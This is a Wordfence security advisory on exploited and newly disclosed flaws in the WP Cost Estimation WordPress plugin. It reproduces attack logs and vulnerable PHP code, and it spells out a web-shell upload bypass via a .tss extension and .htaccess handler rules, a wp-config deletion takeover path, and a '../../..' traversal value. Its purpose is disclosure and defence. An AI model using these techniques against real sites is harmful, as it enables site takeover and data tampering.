Phoenix is an amazing city, and we’ll definitely be back to visit and be of service in making those connections again.

Where will we see you next?

We’re planning visits to a select number of WordCamps this year. Keep up with our travels on our new events page.

The post WordCamp Phoenix Recap appeared first on Wordfence.

Read More

Vulnerabilities Patched in WP Cost Estimation Plugin

At the end of January, Wordfence security analysts identified attackers exploiting vulnerabilities in outdated versions of the commercial plugin WP Cost Estimation & Payment Forms Builder, or WP Cost Estimation for short. These flaws were found and patched by the developer a few months ago, but no official public disclosure was made at the time. Following this discovery, our threat intelligence team reviewed updated versions of the plugin for additional security issues. We reported an unpatched directory traversal vulnerability to the developer, Loopus Plugins, who has since released an update addressing the issue. This flaw is present in plugin versions before 9.660.

Any sites using the plugin should update it to the latest available version. Wordfence WAF users, both free and paid, are already protected from each of these vulnerabilities thanks to broad rules built into the firewall. It is still recommended that Wordfence users perform these updates to ensure their sites are as secure as possible.

In today’s post, we’ll look at the original activity that drew our analysts’ attention to the plugin, then discuss the issues our team identified and disclosed to the developer.

File Upload and Delete Vulnerabilities Exploited In The Wild (Versions < 9.644)

During a forensic review of a compromised site, a Wordfence security analyst identified logs indicating the exploit used to take over the site:

POST /wp-admin/admin-ajax.php?action=lfb_upload_form
POST /wp-admin/admin-ajax.php?action=lfb_upload_form
POST /wp-content/uploads/CostEstimationPayment/_/ngfndfgsdcas.tss

The action lfb_upload_form was traced to the installed WP Cost Estimation plugin, which allowed us to piece together what had taken place. The installed version of the plugin was outdated, and the AJAX action allowing file uploads through form submissions was exploitable.

if (strlen($value["name"]) > 4 &&
$value['size'] < 10485760 &&
strpos(strtolower($value["name"]), '.php') === false &&
strpos(strtolower($value["name"]), '.js') === false &&
strpos(strtolower($value["name"]), '.html') === false &&
strpos(strtolower($value["name"]), '.phtml') === false &&
strpos(strtolower($value["name"]), '.pl') === false &&
strpos(strtolower($value["name"]), '.py') === false &&
strpos(strtolower($value["name"]), '.jsp') === false &&
strpos(strtolower($value["name"]), '.asp') === false &&
strpos(strtolower($value["name"]), '.htm') === false &&
strpos(strtolower($value["name"]), '.shtml') === false &&
strpos(strtolower($value["name"]), '.sh') === false &&
strpos(strtolower($value["name"]), '.cgi') === false
) {

The if statement above served as the only security check on uploaded files in older versions (9.526 in this case), performing some basic filename checks in an attempt to prevent files with executable extensions from being uploaded. Generally speaking, blacklisting uploads based on their filename is not an effective means of implementing upload security, as there tend to be techniques to bypass such methods. One such bypass was used here.

In the log entries above, you may have noticed the lfb_upload_form action being fired twice. This attack involved first uploading a web shell script with a meaningless extension, “ngfndfgsdcas.tss”. While the script was a malicious PHP file, the filename did not contain the string “.php”, and bypassed the blacklist. Then, to allow the uploaded file to execute as a PHP script, the following .htaccess file was uploaded:

AddHandler application/x-httpd-php .tss
AddType application/x-httpd-php .tss

These .htaccess rules associated the “.tss” extension with the PHP handler, allowing the shell to run as a PHP script. As of version 9.644 of WP Cost Estimation, released in October 2018, it is no longer possible to upload a valid .htaccess file to perform this bypass.

Interestingly, despite the attackers’ successful uploads, they quickly followed up with a different exploit against the same plugin. It’s unknown why this second exploit was performed, though it’s our assumption that either the uploaded shell or .htaccess file failed to behave as intended, leaving the attackers to go to Plan B.

In this second attack we see a new AJAX action from WP Cost Estimation, followed by a familiar attack pattern:

POST /wp-admin/admin-ajax.php?action=lfb_removeFile
POST /wp-admin/setup-config.php?step=2
POST /wp-admin/install.php?step=2
GET /wp-login.php
POST /wp-login.php
GET /wp-admin/
GET /wp-admin/theme-install.php?upload
POST /wp-admin/update.php?action=upload-theme
GET /wp-content/themes/AdvanceImage5/config.php

The exploited AJAX action, lfb_removeFile, can be used to delete arbitrary files on a vulnerable site:

public function removeFile(){
$formSession = sanitize_text_field($_POST['formSession']);
$file = sanitize_text_field($_POST['file']);
$fileName = $formSession . '_' . $file;
if(file_exists($this->uploads_dir .$fileName)){
unlink($this->uploads_dir .$fileName);
}
die();
}

The workflow for exploiting an arbitrary file delete flaw is usually the same: Delete the vulnerable site’s wp-config.php file. With no database configuration, WordPress assumes a fresh install is taking place. The attacker is then free to connect the site to their own remote database, log in as an administrator, and upload backdoors through the dashboard.

The lfb_removeFile AJAX action (as well as the associated internal removeFile function shown above) were both removed when the developer became aware of exploits and released version 9.644.

New Vulnerability – Upload Directory Traversal

Following the discovery of the earlier patched vulnerabilities, we spent some time reviewing the patches themselves to ensure they were sufficient. In the version we tested, the uploader had been improved in a few ways:

  • The blacklist of disallowed strings in filenames was expanded to block .htaccess uploads.
  • An admin-controlled whitelist of allowed filetypes was added, by default only allowing PNG, JPG, GIF, RAR, and ZIP files.
  • Forms could now have an internal randomSeed value, a short alphanumeric string appended to the user-input upload path in order to prevent existing directories from being accessed.

However, our investigation revealed a bypass case, allowing attackers to overwrite any file with a whitelisted type on an affected site.

 $ext = $this->get_extension($value["name"]);
$allowedFiles = explode(",", $item->allowedFiles);
if (in_array('.' . strtolower($ext), $allowedFiles)) {
if (!is_dir($this->uploads_dir . $formSession . $form->randomSeed)) {
mkdir($this->uploads_dir . $formSession . $form->randomSeed);
chmod($this->uploads_dir . $formSession . $form->randomSeed, $this->chmodWrite);
}
move_uploaded_file($value["tmp_name"], $this->uploads_dir . $formSession . $form->randomSeed . '/' . $fileName);
chmod($this->uploads_dir . $formSession . $form->randomSeed . '/' . $fileName, 0644);
}

The code block above, taken from the patched version of the uploadFormFiles function, shows the $formSession and $form->randomSeed variables used in a number of places to define an upload path for a given file.

The intent of this behavior is for each visitor to a site to be given a unique $formSession value as a hidden field in each form, so files they upload can be grouped appropriately in directories. However, this value is ultimately user-supplied when the form is submitted, and is susceptible to directory traversal attacks. For example, submitting a $formSession value like ../../.. would place the uploaded file in the document root of a site, rather than in wp-content/uploads/CostEstimationPayment as intended.

This vulnerability is mitigated in part by the addition of the randomSeed value, which would break most directory traversal attempts by appending a random alphanumeric string following the $formSession input. Uploads could still be made to unintended directories, but it would prevent existing files from being overwritten.

Unfortunately, only forms created in the patched version would have an associated randomSeed value stored in the database. Forms which existed prior to the patch, which would certainly be the case for the majority of users, had an empty randomSeed value. This empty value does nothing when appended to the $formSession path, which leaves these forms vulnerable.

Even with a whitelist only allowing images and archives to be uploaded, an attacker could cause serious trouble with an exploit. Any image on a site could be overwritten, allowing defacement campaigns to replace them en masse. If any backups are kept in an accessible location in a zip archive, an attacker could replace this backup with their own poisoned version, containing new users in the database or backdoors buried elsewhere in the file structure. When the backup is restored (perhaps following a mysterious case of overwritten images), these backdoors would be deployed.

Coordinated Disclosure

Once we became aware of the remaining issues, we contacted the developer to begin the process of patching them. We quickly received a response from Charly Biscay of Loopus Plugins. Vendor responses to vulnerability disclosures can be unpredictable, if a response comes at all, but Charly was happy to be notified and worked closely with us through the process of developing a patch.

For this patch, we made three recommendations which were all implemented:

  1. Reject any $formSession containing any non-alphanumeric characters.
  2. Generate new randomSeed values for forms where a value is not present.
  3. Implement .htaccess restrictions in upload directories, so scripts are inaccessible in the event that a successful upload takes place.

The timeline of the discovery, disclosure, and patching of this flaw is as follows:

2019-01-26: Upload directory traversal vulnerability discovered. Vendor contacted through form on CodeCanyon profile.
2019-01-28: Received response from vendor. Continued correspondence via email. Informed vendor of specific issues in WP Cost Estimation plugin.
2019-01-31: Patched version of WP Cost Estimation plugin released on CodeCanyon.

Next Steps

As usual, updating to the latest version of WP Cost Estimation should be made a priority. If your site has been running a vulnerable version of the plugin and you believe your site may have been compromised, consider working with our team on a security audit.

Some good news, sites making use of the Wordfence Firewall are in the clear. Exploits against each vulnerability described in this post are blocked by broad rules which were already built into the WAF, so free users don’t even need to wait. Still, even as a Wordfence user, we recommend performing all available plugin and theme updates to ensure the security of your site.

Conclusion

To recap, our team identified attacks against outdated versions of the WP Cost Estimation & Payment Forms Builder plugin for WordPress. After review, we identified additional flaws and reported these to the developer who quickly released a patch. We recommend all users of this plugin update to the latest version as soon as possible.

For any questions regarding our vulnerability disclosure process, please check out our official policy.

Credits: Initial attack data discovered by Security Analyst Nate Smith. Vulnerability assessment and vendor correspondence by Threat Analyst Mikey Veenstra. Thanks to Charly Biscay of Loopus Plugins for the cooperation and quick patch release.

The post Vulnerabilities Patched in WP Cost Estimation Plugin appeared first on Wordfence.

Read More
Page 5 of 1,017« First...«34567»102030...Last »